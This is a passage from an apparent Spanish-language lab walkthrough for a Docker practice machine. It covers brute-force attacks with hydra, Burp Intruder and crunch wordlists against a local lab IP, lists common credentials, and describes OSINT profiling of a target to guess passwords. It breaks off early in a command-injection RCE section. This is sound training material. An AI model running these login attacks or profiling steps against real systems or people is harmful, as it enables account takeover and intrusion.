</li>
<li><a href="#_rce_remote_code_execution">RCE (Remote Code Execution)</a>
<ul class="sectlevel2">
<li><a href="#_1_rce_directo_mediante_inyección_de_comandos">1. RCE directo mediante inyección de comandos.</a></li>
<li><a href="#_2_rce_mediante_subida_de_archivos_maliciosos">2. RCE mediante subida de archivos maliciosos.</a></li>
</ul>
</li>
<li><a href="#_solucionar_la_máquina">Solucionar la máquina</a>
<ul class="sectlevel2">
<li><a href="#_ataque_de_fuerza_bruta_2">Ataque de Fuerza Bruta</a></li>
<li><a href="#_rce">RCE</a></li>
</ul>
</li>
<li><a href="#_cómo_prevenir">¿Cómo prevenir?</a>
<ul class="sectlevel2">
<li><a href="#_fuerza_bruta">Fuerza Bruta</a></li>
<li><a href="#_rce_2">RCE</a></li>
</ul>
</li>
</ul>
</div>
</div>
<div id="content">
<div class="sect1">
<h2 id="_despliegue_de_la_máquina">Despliegue de la máquina</h2>
<div class="sectionbody">
<div class="paragraph">
<p>Sería conveniente utilizar una distribución Linux, es recomendable usar Kali Linux.</p>
</div>
<div class="paragraph">
<p>Como requisito, necesitaremos tener instalado docker y docker-compose.</p>
</div>
<div class="paragraph">
<p>Podemos ver como instalar docker para varias distribuciones de linux &#8594; <a href="https://docs.docker.com/engine/install/">Instalar Docker</a></p>
</div>
<div class="paragraph">
<p>Podemos ver como instalar docker-compose para varias distribuciones de linux &#8594; <a href="https://docs.docker.com/compose/install/linux/">Instalar Docker-Compose</a></p>
</div>
<div class="paragraph">
<p>Necesitaremos descargar primeramente el auto_deploy.sh, el cual se muestra como una pirámide en la página. Después en un directorio deberemos tener el auto_deploy.sh, ira.tar y docker-compose.yml, deberemos acceder con la terminal a dicho directorio y ejecutar el siguiente comando.</p>
</div>
<div class="paragraph">
<p>(Si el auto_deploy no tiene permisos se los damos mediante <strong>chmod +x</strong>).</p>
</div>
<div class="listingblock">
<div class="content">
<pre class="highlight"><code class="language-bash" data-lang="bash">$ sudo bash auto_deploy.sh ira.tar</code></pre>
</div>
</div>
</div>
</div>
<div class="sect1">
<h2 id="_ataque_de_fuerza_bruta">Ataque de Fuerza Bruta</h2>
<div class="sectionbody">
<div class="paragraph">
<p>Un ataque de fuerza bruta utiliza el método de prueba y error para adivinar la información de inicio de sesión, las claves de cifrado o encontrar una página web oculta. Los hackers estudian todas las combinaciones posibles con la esperanza de acertar. Aunque todos los ataques de fuerza bruta comparten este principio básico de «prueba y error», existen diferentes tipos de ataques de este tipo, cada uno con su propia metodología y estrategia.</p>
</div>
<div class="paragraph">
<p>A continuación vamos a ver los tipos de ataques más frecuentes:</p>
</div>
<div class="sect2">
<h3 id="_1_ataque_de_fuerza_bruta_estándar">1. Ataque de fuerza bruta estándar</h3>
<div class="paragraph">
<p>Este es el ataque de fuerza bruta en su forma más básica. El atacante intenta todas las combinaciones posibles de contraseñas hasta que se encuentre la correcta. Este método puede ser extremadamente lento y consume muchos recursos, pero también puede ser efectivo si la contraseña es débil, ya que muchas personas siguen usando contraseñas débiles, como "admin123" o "1234,", o practican un mal protocolo de contraseñas, como usar la misma contraseña para varios sitios web. Además, si el atacante realiza un trabajo de reconocimiento mínimo puede descifrar la contraseña potencial de una persona, como el nombre de su equipo deportivo favorito.</p>
</div>
</div>
<div class="sect2">
<h3 id="_2_ataque_de_fuerza_bruta_con_diccionario">2. Ataque de fuerza bruta con diccionario</h3>
<div class="paragraph">
<p>Un ataque de diccionario es aquel en el que el atacante selecciona un objetivo y luego prueba las posibles contraseñas contra el nombre de usuario de esa persona, usando un software normalmente. Este método es más rápido que un ataque de fuerza bruta estándar, aún así suele llevar mucho tiempo y tiene una baja probabilidad de éxito en comparación con los métodos de ataque más nuevos y efectivos.</p>
</div>
</div>
<div class="sect2">
<h3 id="_3_ataques_de_fuerza_bruta_híbrida">3. Ataques de fuerza bruta híbrida</h3>
<div class="paragraph">
<p>Un ataque híbrido de fuerza bruta es cuando se combina un método de ataque de diccionario con un simple ataque de fuerza bruta. El atacante comienza con una lista de posibles palabras, luego experimenta con combinaciones de caracteres, letras y números para encontrar la contraseña correcta. Este enfoque permite al atacante descubrir contraseñas que combinan palabras comunes o populares con números, años o caracteres aleatorios, como "SanDiego123" o "Rover2020@".</p>
</div>
</div>
<div class="sect2">
<h3 id="_4_ataques_de_fuerza_bruta_inversa">4. Ataques de fuerza bruta inversa</h3>
<div class="paragraph">
<p>Un ataque de fuerza bruta inversa ve a un atacante comenzar el proceso con una contraseña conocida, que generalmente se descubre a través de una violación de la red. Utilizan esa contraseña para buscar una credencial de inicio de sesión coincidente utilizando listas de millones de nombres de usuario. Los atacantes también pueden usar una contraseña débil de uso común, como "Contraseña123#", para buscar una coincidencia en una base de datos de nombres de usuario.</p>
</div>
</div>
</div>
</div>
<div class="sect1">
<h2 id="_rce_remote_code_execution">RCE (Remote Code Execution)</h2>
<div class="sectionbody">
<div class="paragraph">
<p>La Ejecución Remota de Código (RCE) es una vulnerabilidad crítica que permite a un atacante ejecutar comandos o código arbitrario en un sistema remoto, normalmente con los permisos del proceso vulnerable. Esta falla puede surgir por errores de programación, configuraciones inseguras o el uso inadecuado de funciones que interactúan con el sistema operativo.</p>
</div>
<div class="paragraph">
<p>El impacto de un RCE puede ser devastador, ya que en muchos casos permite al atacante tomar el control completo del sistema, acceder a datos sensibles o incluso pivotar a otros sistemas de la red.</p>
</div>
<div class="paragraph">
<p>Existen múltiples técnicas para explotar esta vulnerabilidad. En nuestro caso, nos centraremos en dos formas comunes de RCE:</p>
</div>
<div class="sect2">
<h3 id="_1_rce_directo_mediante_inyección_de_comandos">1. RCE directo mediante inyección de comandos.</h3>
<div class="paragraph">
<p>Las aplicaciones web mal configuradas o que no sanitizan correctamente las entradas del usuario pueden ser vulnerables a la inyección de comandos. Por ejemplo, si una aplicación pasa parámetros directamente a la línea de comandos sin validación adecuada.</p>
</div>
</div>
<div class="sect2">
<h3 id="_2_rce_mediante_subida_de_archivos_maliciosos">2. RCE mediante subida de archivos maliciosos.</h3>
<div class="paragraph">
<p>Este ataque se da cuando una aplicación permite subir archivos, pero no controla adecuadamente el tipo, contenido o extensión del archivo. Si el servidor guarda ese archivo en un lugar accesible públicamente y permite su ejecución, el atacante puede subir un script malicioso (por ejemplo, PHP) y ejecutarlo remotamente.</p>
</div>
</div>
</div>
</div>
<div class="sect1">
<h2 id="_solucionar_la_máquina">Solucionar la máquina</h2>
<div class="sectionbody">
<div class="paragraph">
<p>En esta guía vamos a ver, cómo realizar diferentes ataques de fuerza bruta, para después adentrarnos en ataques RCE. Aprenderemos distintas herramientas como hydra o burpsuite, entre otras.</p>
</div>
<div class="paragraph">
<p>Herramientas:</p>
</div>
<div class="ulist">
<ul>
<li>
<p><a href="https://portswigger.net/burp/communitydownload">Burpsuite</a></p>
</li>
<li>
<p><a href="https://www.kali.org/tools/hydra/">Hydra</a></p>
</li>
<li>
<p><a href="https://www.kali.org/tools/netcat/">Netcat</a></p>
</li>
</ul>
</div>
<div class="sect2">
<h3 id="_ataque_de_fuerza_bruta_2">Ataque de Fuerza Bruta</h3>
<div class="sect3">
<h4 id="_conceptos_básicos">Conceptos Básicos</h4>
<div class="paragraph">
<p>El Intruder de Burpsuite tiene cuatro modos de operar, nosotros utilizaremos dos de ellos, pero me gustaría explicarlos para que quede claro que hace cada uno.</p>
</div>
<div class="olist arabic">
<ol class="arabic">
<li>
<p><strong>Sniper</strong> &#8594; Este modo prueba una lista de payloads en cada posición de forma individual, manteniendo las demás constantes. Es útil para detectar vulnerabilidades como inyecciones SQL o XSS en parámetros específicos. Por ejemplo, si tienes tres parámetros y una lista de 100 payloads, se realizarán 300 solicitudes (100 por cada parámetro).</p>
</li>
<li>
<p><strong>Battering Ram</strong> &#8594; En este se aplica el mismo payload en todas las posiciones marcadas simultáneamente. Sirve para cuando el mismo valor debe estar presente en múltiples campos, como un token que aparece en varios lugares. Por ejemplo, si marcas dos posiciones y tienes una lista de 50 payloads, se realizarán 50 solicitudes, cada una con el mismo payload en ambas posiciones.​</p>
</li>
<li>
<p><strong>Pitchfork</strong> &#8594; Este utiliza diferentes listas de payloads para cada posición, insertando los payloads correspondientes en paralelo. Se utiliza cuando se necesita probar combinaciones específicas de valores relacionados, como pares de usuario y contraseña correspondientes. Por ejemplo, si tienes dos listas de 100 elementos cada una, se realizarán 100 solicitudes, combinando el primer elemento de cada lista, luego el segundo, y así sucesivamente.</p>
</li>
<li>
<p><strong>Cluster Bomb</strong> &#8594; Genera todas las combinaciones posibles entre múltiples listas de payloads, prueba cada combinación en las posiciones correspondientes. Es ideal para ataques de fuerza bruta donde se desconoce la relación entre los valores, como probar todas las combinaciones posibles de usuarios y contraseñas. Por ejemplo, si tienes una lista de 100 usuarios y otra de 100 contraseñas, se realizarán 10,000 solicitudes (100 x 100).</p>
</li>
</ol>
</div>
</div>
<div class="sect3">
<h4 id="_1_ataque_de_fuerza_bruta_estándar_2">1. Ataque de fuerza bruta estándar</h4>
<div class="paragraph">
<p>Este, al ser un ataque por repetición en el que no se utiliza ningún tipo de software, prefiero dar recomendaciones en caso que queramos probar a realizarlo, ya que es muy tedioso y poco eficiente. Por ello, vamos a ver los usuarios y contraseñas más usados en un panel de login, además de algunas nociones básicas para encontrar información.</p>
</div>
<details>
<summary class="title">Usuarios más usados</summary>
<div class="content">
<div class="listingblock">
<div class="content">
<pre class="highlight"><code class="language-text" data-lang="text">root
admin
test
guest
info
adm
mysql
user
administrator
oracle
ftp
pi
puppet
ansible
ec2-user
vagrant
azureuser</code></pre>
</div>
</div>
</div>
</details>
<details>
<summary class="title">Contraseñas más usadas</summary>
<div class="content">
<div class="listingblock">
<div class="content">
<pre class="highlight"><code class="language-text" data-lang="text">123456
123456789
12345678
password
qwerty123
qwerty1
111111
12345
secret
123123
1234567890
1234567
000000
qwerty
abc123
password1
iloveyou
11111111
dragon
monkey</code></pre>
</div>
</div>
</div>
</details>
<div class="paragraph">
<p>Hay ocasiones en las que no sabremos la identidad del usuario, pero podriamos hacernos a la idea si hacemos un ataque de OSINT a la víctima, conociendo:</p>
</div>
<div class="ulist">
<ul>
<li>
<p><strong>RRSS</strong></p>
<div class="ulist">
<ul>
<li>
<p>Examinar perfiles públicos en plataformas como Facebook, LinkedIn, Twitter e Instagram para obtener nombres, fechas de nacimiento, intereses y otros datos personales que puedan estar relacionados con contraseñas. Identificar nombres de mascotas, equipos deportivos favoritos, fechas significativas, etc.</p>
</li>
</ul>
</div>
</li>
<li>
<p><strong>Búsqueda en Motores de Búsqueda</strong></p>
<div class="ulist">
<ul>
<li>
<p>Utilizar operadores avanzados de búsqueda en Google para encontrar información relacionada con la víctima, como correos electrónicos, nombres de usuario y publicaciones en foros. Ejemplo: <em>site:linkedin.com/in/ "víctima"</em></p>
</li>
</ul>
</div>
</li>
<li>
<p><strong>Revisión de Brechas de Seguridad</strong></p>
<div class="ulist">
<ul>
<li>
<p>Consultar bases de datos de filtraciones de datos para verificar si la información de la víctima ha sido comprometida anteriormente. Existen herramientas como <a href="https://haveibeenpwned.com/">Have I Been Pwned</a> que pueden ser útiles.</p>
</li>
</ul>
</div>
</li>
<li>
<p><strong>Análisis de Metadatos</strong></p>
<div class="ulist">
<ul>
<li>
<p>Descargar y analizar documentos públicos (PDFs, imágenes, etc.) asociados a la víctima para extraer metadatos que puedan revelar nombres de usuario, software utilizado, fechas y más. Para ello recomiendo herramientas como <a href="https://github.com/ElevenPaths/FOCA">FOCA</a>.</p>
</li>
</ul>
</div>
</li>
<li>
<p><strong>Observación de Patrones de Contraseñas</strong></p>
<div class="ulist">
<ul>
<li>
<p>Basándose en la información recopilada, inferir posibles patrones de contraseñas que la víctima podría utilizar, como combinaciones de nombres y fechas (ejemplo: Juan1990).</p>
</li>
</ul>
</div>
</li>
</ul>
</div>
<div class="paragraph">
<p>También recomiendo usar unas cuantas herramientas además de las anteriores:</p>
</div>
<div class="paragraph">
<p><a href="https://www.kali.org/tools/theharvester/">TheHarvester</a> &#8594; Recopila correos electrónicos, subdominios y nombres de usuario asociados a un dominio específico.</p>
</div>
<div class="paragraph">
<p><a href="https://www.kali.org/tools/maltego/">Maltego</a> &#8594; Permite visualizar relaciones entre personas, correos electrónicos, dominios y más mediante gráficos.</p>
</div>
<div class="paragraph">
<p><a href="https://www.kali.org/tools/spiderfoot/">SpiderFoot</a> &#8594; Automatiza la recopilación de información sobre una entidad específica, incluyendo direcciones IP, nombres de usuario y más.</p>
</div>
<div class="paragraph">
<p><a href="https://www.kali.org/tools/sherlock/">Sherlock</a> &#8594; Sirve para localizar el nombre de usario en distintas plataformas.</p>
</div>
<div class="paragraph">
<p><a href="https://osintframework.com/">OSINT Framework</a> &#8594; Un conjunto de herramientas categorizadas para facilitar la investigación OSINT.</p>
</div>
<div class="paragraph">
<p><a href="https://www.kali.org/tools/recon-ng/">Recon-ng</a> &#8594; Framework de reconocimiento web que ofrece módulos para recopilar información sobre objetivos.</p>
</div>
</div>
<div class="sect3">
<h4 id="_2_ataque_de_fuerza_bruta_con_diccionario_2">2. Ataque de fuerza bruta con diccionario</h4>
<div class="paragraph">
<p>En este ataque, aunque ya fue visto en la anterior máquina, lo vimos a través de wpscan. En cambio en esta lo veremos con hydra y burpsuite.</p>
</div>
<div class="paragraph">
<p>Kali viene con varios diccionarios preinstalados en la ruta /usr/share/wordlist. A mi en especial me gusta mucho el de <a href="https://github.com/danielmiessler/SecLists">Seclists</a>, ya que es muy completo. Pero hay que saber usar diccionarios, ya que si usamos primeramente unos muy fuertes nos va a tardar mucho, ya que la desventaja principal de los ataques de fuerza bruta es que usan muchos recursos del ordenador donde se ejecuta y dependiendo de eso, tardará más o menos.</p>
</div>
<div class="sect4">
<h5 id="_hydra">Hydra</h5>
<div class="paragraph">
<p>Cómo no conocemos ni el usuario ni la contraseña, tendremos que usar diccionarios en ambos campos. Pero antes de esto deberemos hacer un estudio de la página, para saber si usa POST o GET, y ver los IDs de los campos:</p>
</div>
<div class="paragraph">
<p>Si le damos al F12 podremos inspeccionar la estructura de la página, viendo que en los campos del usuario y contraseña, sus IDs son <strong>user</strong> y <strong>pass</strong>.</p>
</div>
<div class="imageblock text-center">
<div class="content">
<img src="assets/Fuerza%20Bruta/Diccionario/IDs.png" alt="ID">
</div>
</div>
<div class="paragraph">
<p>Si le damos a Network y enviamos unas credenciales erroneas, veremos que se envían mediante <strong>POST</strong>, además de poder ver la url que será importante para el siguiente comando. Además de conocer el mensaje de error que nos devuelve para poder filtrar, en este caso <strong>"Credenciales incorrectas."</strong>.</p>
</div>
<div class="imageblock text-center">
<div class="content">
<img src="assets/Fuerza%20Bruta/Diccionario/POST.png" alt="POST">
</div>
</div>
<div class="paragraph">
<p>Nuestro comando en hydra es:</p>
</div>
<div class="listingblock">
<div class="content">
<pre class="highlight"><code class="language-bash" data-lang="bash">hydra -L /usr/share/wordlists/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/wordlists/seclists/Passwords/Common-Credentials/2024-197_most_used_passwords.txt 172.34.0.2 http-post-form "/index.php:user=^USER^&amp;pass=^PASS^:Credenciales incorrectas."</code></pre>
</div>
</div>
<div class="ulist">
<ul>
<li>
<p><strong>-L</strong> &#8594; Lista de usuarios</p>
</li>
<li>
<p><strong>-P</strong> &#8594; Lista de contraseñas</p>
</li>
<li>
<p><strong>172.34.0.2</strong> &#8594; Ataca el host objetivo</p>
</li>
<li>
<p><strong>http-post-form</strong> &#8594; Define el método del formulario</p>
</li>
<li>
<p><strong>"/index.php:user=<sup>USER</sup>&amp;pass=<sup>PASS</sup>:Credenciales incorrectas."</strong></p>
<div class="ulist">
<ul>
<li>
<p><em>la ruta del login</em></p>
</li>
<li>
<p><em>los parámetros POST</em></p>
</li>
<li>
<p><em>el mensaje que indica un fallo de login</em></p>
</li>
</ul>
</div>
</li>
</ul>
</div>
<div class="imageblock text-center">
<div class="content">
<img src="assets/Fuerza%20Bruta/Diccionario/Ataque.png" alt="Ataque">
</div>
</div>
<div class="paragraph">
<p>Probamos las credenciales que ha encontrado.</p>
</div>
<div class="imageblock text-center">
<div class="content">
<img src="assets/Fuerza%20Bruta/Diccionario/Cred.png" alt="Credenciales">
</div>
</div>
<div class="imageblock text-center">
<div class="content">
<img src="assets/Fuerza%20Bruta/Diccionario/Entrar.png" alt="Pasar login">
</div>
</div>
<div class="paragraph">
<p>De esta forma, podremos acceder mediante el uso de diccionarios, pero en este caso las credenciales eran sencillas, en peores casos tendremos que esperar horas, aunque depende del hardware del ordenador donde se ejecute.</p>
</div>
</div>
<div class="sect4">
<h5 id="_burpsuite">Burpsuite</h5>
<div class="paragraph">
<p>Primeramente recomiendo instalar FoxyProxy en nuestro navegador. Cuando estemos dentro de este, deberemos irnos a Proxies y crear uno nuevo dándole a Add. Deberemos poner la siguiente configuración, para interceptar con Burpsuite en local desde el puerto 8081. Además deberemos añadir en la parte de patrones el que aparece en la siguiente imagen:</p>
</div>
<div class="imageblock text-center">
<div class="content">
<img src="assets/Fuerza%20Bruta/Diccionario/Burp/FoxyProxy.png" alt="FoxyProxy Config">
</div>
</div>
<div class="paragraph">
<p>Nos vamos a nuestra página donde le daremos al logo de FoxyProxy si lo hemos puesto en la barra de herramientas y le damos al proxy que hemos creado.</p>
</div>
<div class="imageblock text-center">
<div class="content">
<img src="assets/Fuerza%20Bruta/Diccionario/Burp/FoxyProxy2.png" alt="FoxyProxy Navegador">
</div>
</div>
<div class="paragraph">
<p>Ahora abrimos Burpsuite y creamos un proyecto temporal, ya que tendremos la versión de la comunidad, iniciándolo por defecto. Cuando esté abierto, nos vamos a la configuración del proxy donde pondremos la IP y puerto que hemos configurado en FoxyProxy.</p>
</div>
<div class="imageblock text-center">
<div class="content">
<img src="assets/Fuerza%20Bruta/Diccionario/Burp/Burp1.png" alt="Burpsuite">
</div>
</div>
<div class="paragraph">
<p>En Burpsuite, en la parte de Proxy, le damos a <strong>Intercept off</strong> para pasarlo a <strong>on</strong> y comenzar a capturar el tráfico. Y en nuestra página ponemos cualquier credenciales y le damos a entrar, enviándonos a Burpsuite directamente.</p>
</div>
<div class="imageblock text-center">
<div class="content">
<img src="assets/Fuerza%20Bruta/Diccionario/Burp/Burp2.png" alt="Burpsuite2">
</div>
</div>
<div class="imageblock text-center">
<div class="content">
<img src="assets/Fuerza%20Bruta/Diccionario/Burp/LoginBurp.png" alt="Enviar petición">
</div>
</div>
<div class="paragraph">
<p>En Burpsuite, nos aparecerá la petición POST que hemos capturado, donde podremos ver los IDs de los campos, por lo que para atacar desde Burpsuite, deberemos pasar esta petición al intruder, le damos clic derecho sobre la petición y la enviamo a este:</p>
</div>
<div class="imageblock text-center">
<div class="content">
<img src="assets/Fuerza%20Bruta/Diccionario/Burp/Burp3.png" alt="Burpsuite2">
</div>
</div>
<div class="imageblock text-center">
<div class="content">
<img src="assets/Fuerza%20Bruta/Diccionario/Burp/Intruder1.png" alt="Intruder1">
</div>
</div>
<div class="paragraph">
<p>Una vez en el Intruder, deberemos darle al desplegable de arriba y cambiarlo a <strong>Cluster bomb attack</strong>, ya que sirve para ataques que combinan usuarios y contraseñas. Después en los IDs que están en la parte inferior, borraremos el usuario y contraseña que hemos puesto antes en el login, y después de cada símbolo de igual le daremos a <strong>Add §</strong>.</p>
</div>
<div class="imageblock text-center">
<div class="content">
<img src="assets/Fuerza%20Bruta/Diccionario/Burp/Intruder2.png" alt="Intruder2">
</div>
</div>
<div class="paragraph">
<p>A la derecha nos pedirá igresar un payload, es decir, los diccionarios y deberemos poner el correspondiente payload en la posición correcta. En el 1 va el de los usuario y le pongo el diccionario de nombres de usuario frecuentes y en el 2 va la contraseña y por ello le pongo el diccionario de contraseñas sencillas.</p>
</div>
<div class="imageblock text-center">
<div class="content">
<img src="assets/Fuerza%20Bruta/Diccionario/Burp/Intruder3.png" alt="Intruder3">
</div>
</div>
<div class="imageblock text-center">
<div class="content">
<img src="assets/Fuerza%20Bruta/Diccionario/Burp/Intruder4.png" alt="Intruder4">
</div>
</div>
<div class="paragraph">
<p>Además en la configuración del Intruder deberemos cambiar dos cosas:</p>
</div>
<div class="ulist">
<ul>
<li>
<p><strong>Redirections</strong> &#8594; Deberemos poner Always para aceptar las redirecciones.</p>
</li>
</ul>
</div>
<div class="imageblock text-center">
<div class="content">
<img src="assets/Fuerza%20Bruta/Diccionario/Burp/IntruderRedirections.png" alt="Ajuste Redirecciones">
</div>
</div>
<div class="ulist">
<ul>
<li>
<p><strong>Grep - Extract</strong> &#8594; Como hemos hecho antes en el caso de Hydra, deberemos indicarle el mensaje de error. Principalmente se usa para delimitar cuando empieza y cuando acaba el ataque. Por desgracia, no nos aparecerá con nuestra página. Por lo que deberemos estar atentos al cambio de longitud.</p>
</li>
</ul>
</div>
<div class="paragraph">
<p>Una vez dicho esto le damos al botón naranja para iniciar el ataque, empezará a probar tanto usuarios como contraseñas hasta que dé con el correcto, podemos ver el proceso y cuando cambie la longitud, la primera significa que ha entrado con esas, ya que hemos puesto que acepte redirecciones.</p>
</div>
<div class="imageblock text-center">
<div class="content">
<img src="assets/Fuerza%20Bruta/Diccionario/Burp/Entrar.png" alt="Pasar el login">
</div>
</div>
<div class="paragraph">
<p>Cuando quitemos la interceptación del proxy, podremos ver cómo hemos entrado:</p>
</div>
<div class="imageblock text-center">
<div class="content">
<img src="assets/Fuerza%20Bruta/Diccionario/Burp/Entrar2.png" alt="Pasar el login2">
</div>
</div>
</div>
</div>
<div class="sect3">
<h4 id="_3_ataques_de_fuerza_bruta_híbrida_2">3. Ataques de fuerza bruta híbrida</h4>
<div class="sect4">
<h5 id="_hydra_2">Hydra</h5>
<div class="paragraph">
<p>Vamos a crear un diccionario solo con las palabras más comunes y usando <strong>crunch</strong>, de esta forma crearemos un diccionario híbrido más dedicado.</p>
</div>
<div class="paragraph">
<p>Tabla de caracteres especiales de crunch:</p>
</div>
<table class="tableblock frame-all grid-all stretch">
<colgroup>
<col style="width: 50%;">
<col style="width: 50%;">
</colgroup>
<thead>
<tr>
<th class="tableblock halign-left valign-top">Símbolo</th>
<th class="tableblock halign-left valign-top">Significado</th>
</tr>
</thead>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">@</p></td>
<td class="tableblock halign-left valign-top"><p class="tableblock">Minúsculas (a-z)</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">,</p></td>
<td class="tableblock halign-left valign-top"><p class="tableblock">Mayúsculas (A-Z)</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">%</p></td>
<td class="tableblock halign-left valign-top"><p class="tableblock">Números (0-9)</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">^</p></td>
<td class="tableblock halign-left valign-top"><p class="tableblock">Símbolos (!@$%, etc.)</p></td>
</tr>
</tbody>
</table>
<div class="paragraph">
<p>Por lo que realizamos los siguientes comandos, obteniendo un diccionario personal al que le podemos añadir entradas en caso de encontrar información más relevante.</p>
</div>
<div class="listingblock">
<div class="content">
<pre class="highlight"><code class="language-bash" data-lang="bash">$ crunch 8 8 admin%%% &gt;&gt; diccionario.txt
$ crunch 9 9 qwerty%%% &gt;&gt; diccionario.txt
$ crunch 7 7 @@@@123 &gt;&gt; diccionario.txt
$ crunch 7 7 user^^^ &gt;&gt; diccionario.txt</code></pre>
</div>
</div>
<div class="paragraph">
<p>En este ataque vamos a atacar directamente a la cuenta <strong>admin</strong> con hydra. De esta forma veremos el uso del parametro -l y como actuar en caso de conocer al usuario.</p>
</div>
<div class="listingblock">
<div class="content">
<pre class="highlight"><code class="language-bash" data-lang="bash">hydra -l admin -P diccionario.txt 172.34.0.2 http-post-form "/index.php:user=^USER^&amp;pass=^PASS^:Credenciales incorrectas."</code></pre>
</div>
</div>
<div class="ulist">
<ul>
<li>
<p><strong>-l</strong> &#8594; En este parámetro ponemos el nombre del usuario.</p>
</li>
</ul>
</div>
<div class="imageblock text-center">
<div class="content">
<img src="assets/Fuerza%20Bruta/Hibrido/Hydra/Ataque.png" alt="Ataque">
</div>
</div>
</div>
<div class="sect4">
<h5 id="_burpsuite_2">Burpsuite</h5>
<div class="paragraph">
<p>En este caso, realizaremos lo ya visto anteriormente hasta la parte del Intruder. En este caso, vamos a usar el Sniper attack, donde se usa en una posicion, un objetivo. Deberemos añadir los símbolos en la parte de la contraseña.</p>
</div>
<div class="imageblock text-center">
<div class="content">
<img src="assets/Fuerza%20Bruta/Hibrido/Burp/Intruder1.png" alt="Intruder1">
</div>
</div>
<div class="paragraph">
<p>En este caso vamos a poner unas cuantas palabras en la parte de payload, añadiendo una por una, y luego añadiremos a cada una distintos sufijos.</p>
</div>
<div class="imageblock text-center">
<div class="content">
<img src="assets/Fuerza%20Bruta/Hibrido/Burp/Intruder2.png" alt="Intruder2">
</div>
</div>
<div class="paragraph">
<p>En la parte de Payload processing, añadiremos los sufijos, para ello le daremos a añadir, en la pestaña buscamos "Add sufix" y ponemos el que queramos, además podemos ponerles incluso prefijos para hacerlo más completo. Pero deberemos activarlos según queramos, ya que si todos están activos se acumulan y eso no lo queremos, por lo que voy a ir uno por uno.</p>
</div>
<div class="imageblock text-center">
<div class="content">
<img src="assets/Fuerza%20Bruta/Hibrido/Burp/Intruder3.png" alt="Intruder3">
</div>
</div>
<div class="imageblock text-center">
<div class="content">
<img src="assets/Fuerza%20Bruta/Hibrido/Burp/Intruder4.png" alt="Intruder4">
</div>
</div>
<div class="paragraph">
<p>Al final nos debe quedar algo así:</p>
</div>
<div class="imageblock text-center">
<div class="content">
<img src="assets/Fuerza%20Bruta/Hibrido/Burp/Intruder5.png" alt="Intruder5">
</div>
</div>
<div class="paragraph">
<p>También es importante recordar que en la configuración hay que cambiar lo de las redirecciones a siempre. Dicho esto, vamos a probar el ataque:</p>
</div>
<div class="paragraph">
<p>Si probamos con el primer sufijo, ninguno es correcto, por lo que queda descartado. De esta forma deberemos probarlo con cada uno.</p>
</div>
<div class="imageblock text-center">
<div class="content">
<img src="assets/Fuerza%20Bruta/Hibrido/Burp/Ataque1.png" alt="Ataque1">
</div>
</div>
<div class="imageblock text-center">
<div class="content">
<img src="assets/Fuerza%20Bruta/Hibrido/Burp/Ataque2.png" alt="Ataque2">
</div>
</div>
<div class="paragraph">
<p>Podemos observar que con el último sufijo que hemos introducido es correcto, ya que a variado la longitud. Y cuando quitemos el proxy ya estermos dentro.</p>
</div>
</div>
</div>
<div class="sect3">
<h4 id="_4_ataques_de_fuerza_bruta_inversa_2">4. Ataques de fuerza bruta inversa</h4>
<div class="sect4">
<h5 id="_hydra_3">Hydra</h5>
<div class="paragraph">
<p>En este caso, deberemos usar una contraseña que ya sabemos que alguien utiliza, en nuestro caso va a ser <strong>qwerty123</strong>, pero no conocemos al usuario por lo que podemos usar algún diccionario de los anteriores mencionados o crear uno con los usuarios más utilizados.</p>
</div>
<div class="listingblock">
<div class="content">
<pre class="highlight"><code class="language-bash" data-lang="bash">hydra -L /usr/share/wordlists/seclists/Usernames/top-usernames-shortlist.txt -p qwerty123 172.34.0.2 http-post-form "/index.php:user=^USER^&amp;pass=^PASS^:Credenciales incorrectas."</code></pre>
</div>
</div>
<div class="ulist">
<ul>
<li>
<p><strong>-p</strong> &#8594; En este parámetro ponemos la contraseña que creamos correcta.</p>
</li>
</ul>
</div>
<div class="imageblock text-center">
<div class="content">
<img src="assets/Fuerza%20Bruta/Inverso/Hydra/Ataque.png" alt="Ataque">
</div>
</div>
</div>
<div class="sect4">
<h5 id="_burpsuite_3">Burpsuite</h5>
<div class="paragraph">
<p>Como ya hemos visto antes, deberemos hacer lo mismo hasta el punto del Intruder, donde añadiremos los símbolos en el usuario y meteremos un payload para adivinarlo.</p>
</div>
<div class="imageblock text-center">
<div class="content">
<img src="assets/Fuerza%20Bruta/Inverso/Burp/Intruder.png" alt="Intruder">
</div>
</div>
<div class="imageblock text-center">
<div class="content">
<img src="assets/Fuerza%20Bruta/Inverso/Burp/Ataque.png" alt="Ataque">
</div>
</div>
<div class="paragraph">
<p>Como podemos observar el usuario correcto es <strong>admin</strong>.</p>
</div>
</div>
</div>
</div>
<div class="sect2">
<h3 id="_rce">RCE</h3>
<div class="paragraph">
<p>Una vez dentro, gracias a los ataques de fuerza bruta, en el panel de administrador se puede acceder a una linea de comandos para administrar desde la web, y también se puede acceder a una página para subir archivos y poder verlos mediante un enlace. A continuación vamos a ver estos dos tipos de ataque RCE:</p>
</div>
<div class="sect3">
<h4 id="_1_rce_directo_mediante_inyección_de_comandos_2">1. RCE directo mediante inyección de comandos.</h4>
<div class="paragraph">
<p>Teniendo a nuestra disposición una terminal, vamos a recolectar información para luego hacer una reverse shell y poder efectuar comando con mayor tranquilidad.</p>
</div>
<div class="imageblock text-center">
<div class="content">
<img src="assets/RCE/CMD/Página.png" alt="Página">
</div>
</div>
<div class="sect4">
<h5 id="_conocer_estructura_de_archivos">Conocer estructura de archivos</h5>
<div class="ulist">
<ul>
<li>
<p><strong>ls -la</strong> &#8594; Con este comando podemos ver todos los archivos del directorio actual, conociendo sus permisos, usuario y grupo.</p>
</li>
</ul>
</div>
<div class="imageblock text-center">
<div class="content">
<img src="assets/RCE/CMD/LS.png" alt="comando ls">
</div>
</div>
<div class="ulist">
<ul>
<li>
<p><strong>pwd</strong> &#8594; Podemos saber en qué directorio estamos</p>
</li>
</ul>
</div>
<div class="imageblock text-center">
<div class="content">
<img src="assets/RCE/CMD/PWD.png" alt="comando pwd">
</div>
</div>
</div>
<div class="sect4">
<h5 id="_usuarios">Usuarios</h5>
<div class="ulist">
<ul>
<li>
<p><strong>whoami</strong> &#8594; Podemos conocer que usuario somos. Podemos ver que somos root, por lo que podemos hacer de todo.</p>
</li>
</ul>
</div>
<div class="imageblock text-center">
<div class="content">
